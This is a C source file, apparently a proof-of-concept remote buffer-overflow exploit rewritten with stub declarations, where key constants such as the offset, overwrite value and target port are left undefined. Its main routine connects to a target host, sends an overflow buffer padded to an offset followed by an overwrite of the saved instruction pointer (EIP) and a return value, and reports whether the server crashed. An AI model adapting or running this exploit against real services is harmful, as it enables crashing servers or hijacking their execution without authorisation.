
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct in_addr {scalar_t__ s_addr; } ;
struct sockaddr_in {int sin_family; int sin_port; struct in_addr sin_addr; } ;
struct sockaddr {int dummy; } ;
struct hostent {scalar_t__ h_addr; } ;
typedef int peer ;
typedef int WSADATA ;


 int AF_INET ;
 int BUFFSIZE ;
 int CHZ ;
 int EIP ;
 scalar_t__ INADDR_NONE ;
 int IPPROTO_TCP ;
 int MAKEWORD (int,int ) ;
 int OFFSET ;
 int PORT ;
 int RETURN ;
 int SOCK_STREAM ;
 int WSACleanup () ;
 int WSAStartup (int ,int *) ;
 int closesocket (int) ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int ) ;
 scalar_t__ inet_addr (char*) ;
 int memcpy (unsigned char*,int ,int) ;
 int memset (unsigned char*,int ,int) ;
 int printf (char*,...) ;
 int recv (int,unsigned char*,int,int ) ;
 int send (int,unsigned char*,int,int ) ;
 int setbuf (int ,int *) ;
 int sock_err (int) ;
 int socket (int ,int ,int ) ;
 int stdout ;

int main(int argc, char *argv[]) {
 setbuf(stdout, ((void*)0));
 if(argc < 2) {
  printf("\nUsage: %s <host>\n", argv[0]);
  exit(1);
 }

 unsigned char buff[BUFFSIZE];
 struct sockaddr_in peer;
 struct hostent *hp;
 int shandle,
  err;
 WSADATA wsadata;

 WSAStartup(MAKEWORD(2,0), &wsadata);
 if(inet_addr(argv[1]) == INADDR_NONE) {
                hp = gethostbyname(argv[1]);
  if(hp == 0) sock_err(-1);
                else peer.sin_addr = *(struct in_addr *)hp->h_addr;
        }
                else peer.sin_addr.s_addr = inet_addr(argv[1]);
 peer.sin_port = htons(PORT);
 peer.sin_family = AF_INET;

 memset(buff, CHZ, OFFSET);
 memcpy(buff + OFFSET, EIP, 4);
 memcpy(buff + OFFSET + 4, RETURN, 4);

 shandle = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 sock_err(shandle);
 err = connect(shandle, (struct sockaddr *)&peer, sizeof(peer));
 sock_err(err);
 err = send(shandle, buff, BUFFSIZE, 0);
 sock_err(err);
 err = recv(shandle, buff, BUFFSIZE, 0);
 if(err < 0) printf("\nServer crashed!\n");
  else printf("\nServer is not vulnerable\n");
 closesocket(shandle);
 WSACleanup();
 return(0);
}
